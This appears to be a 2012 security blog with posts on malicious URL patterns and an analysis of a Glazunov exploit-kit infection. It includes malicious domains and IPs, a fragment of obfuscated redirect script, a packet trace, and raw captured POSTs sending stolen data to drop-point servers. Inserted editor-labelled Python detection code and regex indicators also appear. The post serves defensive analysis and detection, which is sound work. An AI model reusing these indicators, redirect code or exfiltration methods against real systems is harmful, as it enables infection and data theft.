Sunday, December 30, 2012

Parenthesis URL Pattern, Likely Associated with Badness

I ran into an interesting URL pattern containing parentheses in a specific arrangement. On deeper inspection, it looks like this pattern may be associated with badness; I am not certain of the details, but thought it worth bringing to the community.


My research on this so far indicates that some of the URLs are associated with known Zeus/SpyEye C2 servers, and that a large number of URLs with this pattern are hosted on legitimate sites, in subdirectories that are not indexed by Google. It also appears this pattern has been active for some time and may have been identified by other researchers; I am not sure.

Some URLquery results show redirects to a domain that was reported in December as associated with drive-by downloads in an Android forum which is no longer operational (at least as of today).

The observation at this time is that these are redirects, or contain redirects, to badness, which is why I am bringing it to the community.

The URL pattern in question is:

\(s\(\w{24}\)\)?\/\w{2,}\.aspx

There is one URLquery report on this type of URL here. On inspection, this report shows a series of GET requests, including one URL which traces back to a report on undroid.us as containing badness (hxxp://zirycatum.com/k985ytv.htm). I also noticed k985ytv.htm more than once.




And I'm not alone in looking at this; it goes back a while now.

AVG did recognize the content.


Jsunpack

www.undroid.us/wordpress/?cat=19
Dec 8, 2012 - 2. zirycatum.com (ex: hxxp://zirycatum.com/k985ytv.htm) 3. numudozaf.com (ex: hxxp://numudozaf.com/k985ytv.htm) Above all resolve to the same Moldova (south ...



Any feedback or further info, hit me up @fknsec

I have not researched whether any IDS (Snort) signatures match this pattern.

HAPPY NEW YEAR
References:
http://urlquery.net/report.php?id=14666
www.undroid.us/wordpress/?cat=19
http://jsunpack.jeek.org/?report=fc505de91ae02e6ed905bb22746975e5d4d70c93
http://forums.cnet.com/7726-6132_102-3375245.html

Sunday, December 16, 2012

Unrecognized URL Pattern Involving Malware Binaries

In the interest of keeping FPs to a minimum, I'm including the mooo.com, but pull it out if you want to test your site for FPs. This appears to be designed to deliver malware binaries, and at this point I do not have more to share. I would keep an eye out for this one; please feed back any info to @fknsec #teamwork.


Pattern type 1
mooo\.com\/\w{2,8}\d{3}\_\d{4}\.php\?\w{4,10}\=

Pattern type 2 (appears to be only binaries)

mooo.com\/\?\w{2,9}\=[a-zA-Z0-9]{16,}


Pattern type 1 examples:




Pattern Type 2: Binary (as per Exploit Shield)


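Added example, not the posts' own code: the three indicator regexes from this post and the parenthesis post above, run exactly as published over constructed proxy-log lines, alongside a broadened variant of pattern type 2 (an editor's assumption) that also accepts the base64 characters '+' and '/' and percent-encoded bytes, which the published character class rejects. It assumes case-insensitive matching for the parenthesis pattern and log lines of the form 'timestamp client url'; all hosts and values are placeholders.

```python
import re
from typing import List, Tuple

# Indicator regexes exactly as published in the two posts.
PATTERNS = {
    # Also the shape of ASP.NET cookieless session-state URLs, /(S(<24 chars>))/,
    # so this fires on legitimate sites: a pivot for investigation, not a verdict.
    "aspx-paren-session": re.compile(r"\(s\(\w{24}\)\)?\/\w{2,}\.aspx", re.IGNORECASE),
    "mooo-type1-php": re.compile(r"mooo\.com\/\w{2,8}\d{3}\_\d{4}\.php\?\w{4,10}\="),
    "mooo-type2-binary": re.compile(r"mooo\.com\/\?\w{2,9}\=[a-zA-Z0-9]{16,}"),
    # Editor-added variant (assumption): base64-style values can contain '+', '/'
    # and percent-encoded bytes, which the published character class rejects.
    "mooo-type2-broad": re.compile(r"mooo\.com\/\?\w{2,9}\=[a-zA-Z0-9+/%]{16,}"),
}

# Constructed proxy log lines, "timestamp client url" (hosts and values are placeholders).
SAMPLE_LOG = """\
2012-12-14T10:01:02 10.1.2.3 http://www2.abcdefghij.mooo.com/udhnj106_5613.php?8tpb=XNp2KKso9zwx9vOme7R2
2012-12-14T10:01:05 10.1.2.3 http://www2.klmnopqrst.mooo.com/?0aimsen=VMTW0bDK5ttT3uKXdWara
2012-12-14T10:01:09 10.1.2.3 http://www2.klmnopqrst.mooo.com/?slwo4wee=l8%2Fk03Hc3cqcotLdcG1o
2012-12-14T10:02:30 10.1.2.4 http://shop.example.test/(S(abcdefghijklmnopqrstuvwx))/default.aspx
2012-12-14T10:03:00 10.1.2.5 http://www.example.test/index.html
"""

def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (timestamp, pattern_name, url) for each pattern a URL matches."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        ts, url = fields[0], fields[2]
        for name, rx in PATTERNS.items():
            if rx.search(url):
                hits.append((ts, name, url))
    return hits

def session_token(url: str) -> str:
    """Pull the 24-character token out of a parenthesis-pattern URL ("" if none)."""
    m = re.search(r"\(s\((\w{24})\)\)", url, re.IGNORECASE)
    return m.group(1) if m else ""

if __name__ == "__main__":
    for ts, name, url in scan_log(SAMPLE_LOG):
        print(ts, name, url)
```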

Friday, December 7, 2012

Case Study: Exploiting Weakness To Quietly Exfiltrate Data

As per Emerging Threats, this is the Glazunov exploit kit.

This particular case is an excellent example demonstrating that malware authors do their best to avoid detection and do not play by the rules of the internet. Defense in depth is a critical component of any information security program and would help limit the damage from an attack of this nature.

This example shows:
  • A compromised or malicious site which is, for the most part, unrecognized.
  • A redirect to HTTP on TCP port 8080, direct to an IP address.
  • Content delivery which appears innocuous in URL logs.
  • Java exploits which are not detected by virtually any AV.
  • Malware which is not detected.
  • Exfiltration of data on high ports, showing only as TCP connections.
  • Use of other people's IP addresses as drop points.

This was achieved because of the following gaps in security:

  • The endpoint did not have an updated Java version and was vulnerable.
  • Web filtering did not block direct-to-IP requests.
  • Layer 7 filtering was not performed at the perimeter (IPS) for the exploit code.
  • AV did not detect the malware.
  • Outbound ports were not restricted; the endpoint could communicate outbound.




The entry point is a 301 redirect; however, the content length is a28 and there is what AVG recognizes as a Blackhole redirect in the 301 response.
hxxp://www.helloooooo.com/2009/01/splinter-impostor-claims-worlds-longest-hair/
This is a dangerous website and should not be visited in a browser.



The next step is for me to get the redirect URL.

GET /2009/01/splinter-impostor-claims-worlds-longest-hair/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.helloooooo.com
Connection: Keep-Alive

And it gives me a gift... to quote my friend Tarun.
HTTP/1.1 200 OK
Date: Tue, 27 Nov 2012 00:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.helloooooo.com/xmlrpc.php
Link: <http://www.helloooooo.com/?p=1892>; rel=shortlink
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
5244
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];



The redirect is to rigo6680.zapto.org/?go=2, which is consistent with TDS redirects.

http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b

Additional redirects appear everywhere on the page, see the CSS redirect below.

Redirect from a CSS file.
http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725

What happens next?


The following URL chain occurs. Included in here is a YouTube video (the 74.125.x.y IP address).


609  31.956187  10.1.2.3 -> 74.125.236.9 HTTP 408 GET /v/hYaYCPmFWKw&hl=en&fs=1 HTTP/1.1
613  32.126215  10.1.2.3 -> 65.163.12.222 HTTP 454 GET /wp-content/themes/twentyten/images/wordpress.png HTTP/1.1
616  32.196442 65.163.12.222 -> 10.1.2.3  HTTP 1152 HTTP/1.1 200 OK  (PNG)
625  32.545505 74.125.236.9 -> 10.1.2.3  HTTP 674 HTTP/1.1 200 OK  (application/x-shockwave-flash)
637  33.374071  10.1.2.3 -> 64.34.183.111 HTTP 335 GET /2354796716/12230 HTTP/1.1
673  33.543459  10.1.2.3 -> 74.125.236.1 HTTP 382 GET /yts/swfbin/watch_as3-vfl1ubMZd.swf HTTP/1.1
688  33.587050 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
695  33.626438  10.1.2.3 -> 64.34.183.111 HTTP 292 GET /2354796716/12230 HTTP/1.1
744  33.867125 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
770  34.193535  10.1.2.3 -> 64.34.183.111 HTTP 245 GET /15692 HTTP/1.1
931  34.501338 64.34.183.111 -> 10.1.2.3  HTTP/DL 958 unknown (0x4d)

Here's the Java.




And we run the Java, which contains CVE 2012-1723; the binary materializes and is executed immediately.


Posting Data to Drop Points


What we get are connections on TCP port 35516 posting data to compromised Windows servers online. What is interesting is that this is not recognized as HTTP; it shows only as protocol TCP on outbound port 35516. This would fly under the radar of many detection mechanisms.

This infection is a wonderful case study of an infection chain using difficult-to-detect methods and exploiting weaknesses in infrastructure, perimeter security and vulnerable workstation software.

Four IP addresses were drop points:
131.96.243.22
74.59.207.114
68.197.117.117
87.203.78.137

The infection point is 64.34.183.111:8080

Here is what the posting looks like.

VT for the Jar file (CVE 2012-1723): 2/46
https://www.virustotal.com/file/4f88dd9dbeaba9a59ab1c077b4e98be72c66e59f79ad8cc95c0952530ca698f3/analysis/1354328781/

ed-309-aaenak.gsu.edu

Raw POST information


POST /nymain/nm1932719/index.php HTTP/1.1
Host: 131.96.243.22
Content-Length: 54
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=bphgt.ntz&data=œT¬»ñOõ[!5a9±r8ÆàSÞ¼ƒAôˆPöêÙ

HTTP/1.1 200 OK
Content-Length: 4
Connection: close

[

------------------------------------------------------------------


POST /nymain/nm1932719/index.php HTTP/1.1
Host: 74.59.207.114
Content-Length: 58
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=skjlrke.kcf&data=¾¤±ß]NçWB\—%~}SóC坣tZ‡£¬4Ø–‘

videotron.ca (1)
Host: modemcable114.207-59-74.mc.videotron.ca
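Added example, not from the post: a port-agnostic HTTP request parser that scores a raw TCP payload for the traits of the drop-point posting above, namely a POST to a bare-IP Host on a nonstandard port whose x-www-form-urlencoded body carries unencoded binary bytes, so such traffic can be caught even when the sensor does not label port 35516 as HTTP. The sample request reuses the posting's headers with a placeholder Host (192.0.2.10) and constructed body bytes.

```python
import re
from typing import Dict, Optional, Tuple

IPV4_HOST = re.compile(rb"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
REQUEST_LINE = re.compile(rb"^(?:POST|GET) \S+ HTTP/1\.[01]\r\n")

# Constructed sample: the posting's headers, a placeholder Host and constructed binary "data=".
SAMPLE_BODY = b"filename=bphgt.ntz&data=" + bytes(range(0x80, 0x9E))
SAMPLE_POST = b"\r\n".join([
    b"POST /nymain/nm1932719/index.php HTTP/1.1",
    b"Host: 192.0.2.10",
    b"Content-Length: %d" % len(SAMPLE_BODY),
    b"Accept-Encoding: deflate",
    b"Content-Type: application/x-www-form-urlencoded",
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)",
    b"Pragma: no-cache", b"Cache-Control: no-cache", b"Connection: close",
    b"", SAMPLE_BODY,
])

def parse_request(payload: bytes) -> Optional[Tuple[bytes, bytes, Dict[bytes, bytes], bytes]]:
    """Parse an HTTP/1.x request out of a raw TCP payload, whatever port carried it."""
    if not REQUEST_LINE.match(payload):
        return None
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _ = lines[0].split(b" ", 2)
    headers = {}
    for raw in lines[1:]:
        key, _, value = raw.partition(b":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body

def exfil_indicators(payload: bytes, dst_port: int) -> Dict[str, bool]:
    """Score the traits of the drop-point POSTs; {'http': False} if not HTTP at all."""
    parsed = parse_request(payload)
    if parsed is None:
        return {"http": False}
    method, _path, headers, body = parsed
    ctype = headers.get(b"content-type", b"")
    # A urlencoded form body should be printable ASCII only; raw high or control
    # bytes mean the client never encoded its "data=" field.
    has_binary = any(b < 0x20 or b > 0x7E for b in body)
    return {
        "http": True,
        "post_to_bare_ip": method == b"POST" and bool(IPV4_HOST.match(headers.get(b"host", b""))),
        "nonstandard_port": dst_port not in (80, 443, 8080),
        "binary_in_form_body": b"x-www-form-urlencoded" in ctype and has_binary,
    }
```

The three checks are independent, so a sensor can weight them; the page's own POSTs on port 35516 would score on all three.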



@fknsec

All investigations were performed in my personal lab. This article's content and any opinions expressed are not the opinions of any past, present or future employer. Lawyers are our friends.